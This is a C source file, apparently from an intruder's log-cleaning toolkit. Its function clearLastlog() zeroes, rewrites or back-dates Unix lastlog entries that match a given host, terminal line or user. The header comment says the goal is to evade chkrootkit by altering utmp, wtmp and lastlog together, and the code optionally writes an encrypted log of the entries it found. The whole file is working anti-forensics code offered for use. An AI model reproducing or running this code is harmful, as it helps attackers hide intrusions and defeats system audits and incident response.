#include <stdio.h>
#include <stdbool.h>
#include <stdlib.h>
#include <string.h>
#include <sys/types.h>
#include <pwd.h>
#include <time.h>

#ifdef linux
#include <lastlog.h>
#endif

#ifdef openbsd
#include <utmp.h>
#define __time_t   time_t
#endif

#ifdef netbsd
#include <utmp.h>
#define __time_t   time_t
#endif

#ifdef freebsd
#include <utmp.h>
#endif

#include <log_it.h>
#include <logs_lastlog.h>


/*
 * clearLastlog() removes/changes logs from the lastlogfile
 *    If no replace string or no time is given, it will zero the entry (**Never logged in**)
 *    BUT: if there are logentrys in utmp/wtmp but NOT in the lastlog chkrootkit will give an alert!
 *    SO remove it everywhere, or modify it everywhere!
 *    Don't forget!!!
 * 
 * 		file 		the utmp/wtmp logfile
 * 		to_file		write into this file
 * 		string		generic string to look for (host/tty)
 * 		replace		replace with this string
 * 		user		clean this user
 * 		time		set new time for matching logs
 *		
 *		Return:
 *		  Sucess:	number of changes/deleted entrys
 * 	 	  Error:
 * 	  			-1	no utmp/wtmp file
 * 	  			-2	no file to write
 * 	  			-3 	nothing to clean (string/user)
 * 	  			-4	error in opening file to read
 * 	  			-5	error in opening to_file to write
	
 * 		
 *
 */
int clearLastlog(const char *file,
                 const char *to_file,
		           const char *string,
		           const char *replace,
		           const char *user,
		           time_t change_time,
		           int verbose, const char *logfile, const char *key)
{
   FILE *f_read, *f_write;
   struct lastlog info;
   struct lastlog save;
   static struct passwd *pwent;
   bool found1 = false, found2 = false, saved = false;
   long offset;
   int total = 0, cleared = 0;
   char *check = 0;
   uid_t user2;
   char *user3;
   time_t temp;
   
   /* Idiot checking (newer trust programmers!) */
   if(!file) {
	   fprintf(stderr, "[ERROR] No file to clean!\n");
	   return -1;
   }
   if(!to_file) {
	   fprintf(stderr, "[ERROR] No file to write to!\n");
	   return -2;
   }
   if((!string) && (!user)) {
	   fprintf(stderr, "[ERROR] No string for cleaning!\n");
	   return -3;
   }
   
   /* give status message */
   if(verbose > 2) {
	   printf("[STATUS] Clear lastlog  (%s)\n", file);
   }
   
   /* Open all files */
   if((f_read = fopen(file, "r")) == 0) {
	   fprintf(stderr, "[ERROR] in read opening %s\n", file);
	   perror("[ERROR] replace_in_file(): ");
	   return -4;
   }
   if((f_write = fopen(to_file, "w")) == 0) {
	   fprintf(stderr, "[ERROR] in write opening %s\n", to_file);
	   perror("[ERROR] replace_in_file(): ");
	   return -5;
   }  
   setpwent();
   
   /* read every user from /etc/passwd */
   while ((pwent = getpwent())) {
	   user2 = pwent->pw_uid;
	   user3 = pwent->pw_name;
      
      /* go to the logentry */
	   offset = (unsigned long) user2 *sizeof(info);
	   fseek(f_read, offset, SEEK_SET);
	   fseek(f_write, offset, SEEK_SET);
	   
      /* reset */
	   memset(&info, 0, sizeof(info));
	   memset(&save, 0, sizeof(save));
	   found1 = false;
	   found2 = false;
	   saved = false;
	   
      /* read lastlog */
	   if(fread((char *) &info, sizeof(info), 1, f_read) != 1) {
         /* nobody is a false positive */
         if (strncmp(pwent->pw_name, "nobody", strlen("nobody")) !=0) {
#ifndef linux
            if ( verbose > 3) {
#endif               
               fprintf(stderr, "[ERROR] lastlog->%s\n", pwent->pw_name);
#ifndef linux
            }
#endif
         }
	      continue;
	   }
	   total++;
	   
      /* ll_host */
	   if(string) {
	      /* grep */
	      check = 0;
	      check = strstr(info.ll_host, string);
	      if(check) {	/* string found */
		      found1 = true;
		      found2 = true;
		      /* save the orginal for verbose/logging */
		      if(saved == false) {
		         memcpy(&save, &info, sizeof(struct lastlog));
		         saved = true;
		      }
		      if(replace) {	/* replace it */
		         memset(&info.ll_host, 0, UT_HOSTSIZE);
		         strncpy(info.ll_host, replace, UT_HOSTSIZE - 1);
		         found1 = false;
		      }
		      if(change_time) {	/* change the time */
		         memset(&info.ll_time, 0, sizeof(__time_t));
		         memcpy(&info.ll_time, &change_time, sizeof(time_t));
		         found1 = false;
		      }
		      if(found1 == true) {	/* zero it out */
		         memset(&info, 0, sizeof(info));
		      }
	      }
	   }
	   /* ll_line */
	   if(string) {
	      /* grep */
	      check = 0;
	      check = strstr(info.ll_line, string);
	      if(check) {
		      found1 = true;
		      found2 = true;
		      if(saved == false) {
		         memcpy(&save, &info, sizeof(struct lastlog));
		         saved = true;
		      }
		   if(replace) {
		      memset(&info.ll_line, 0, UT_LINESIZE);
		      strncpy(info.ll_line, replace, UT_LINESIZE - 1);
		      found1 = false;
		   }
		   if(change_time) {
		      memset(&info.ll_time, 0, sizeof(__time_t));
		      memcpy(&info.ll_time, &change_time, sizeof(time_t));
		      found1 = false;
		   }
		   if(found1 == true) {
		      memset(&info, 0, sizeof(info));
		   }
	   }
	}
	
   /* user */
	if(user) {
      if(strcmp(user, user3) == 0) { /* it matches the given user */
		   found1 = true;
		   found2 = true;
         if(saved == false) {
		      memcpy(&save, &info, sizeof(struct lastlog));
		      saved = true;
		   }
		   if(change_time) {
		      memset(&info.ll_time, 0, sizeof(__time_t));
		      memcpy(&info.ll_time, &change_time, sizeof(time_t));
		      found1 = false;
		   }
		   if(found1 == true) {
		      memset(&info, 0, sizeof(info));
		   }
	   }
	}
	
   /* verbose */
	if(found2 == true) {
      cleared++;
	   temp = (time_t) save.ll_time;
	   if(verbose > 3) {
		   printf("[FOUND]	%s: %s   %s |%s", pwent->pw_name, save.ll_line, 
                save.ll_host, ctime(&temp));
	   }
	   
      /* log it */
	   if(logfile) {
		   if(key) {
		      crypt_log_it(logfile, key, "[FOUND]	%s: %s   %s |%s", pwent->pw_name,
                         save.ll_line, save.ll_host, ctime(&temp));
		   } else {
            log_it(logfile, "[FOUND]	%s: %s   %s  |%s", pwent->pw_name, 
                   save.ll_line, save.ll_host, ctime(&temp));
		   }
	   }
	}

	/* write it into file */
	if(fwrite(&info, 1, sizeof(info), f_write) != sizeof(info)) {
      fprintf(stderr, "[ERROR] clearLastlog: write to %s\n", to_file);
	}
 }	/* end users */

   /* Closing files again */
   fclose(f_write);
   fclose(f_read);

   /* be verbose */
   if(verbose > 2) {
	   printf("[STATUS]	cleared %d  of %d log entrys\n", cleared, total);
   }
   
   return(cleared);
}
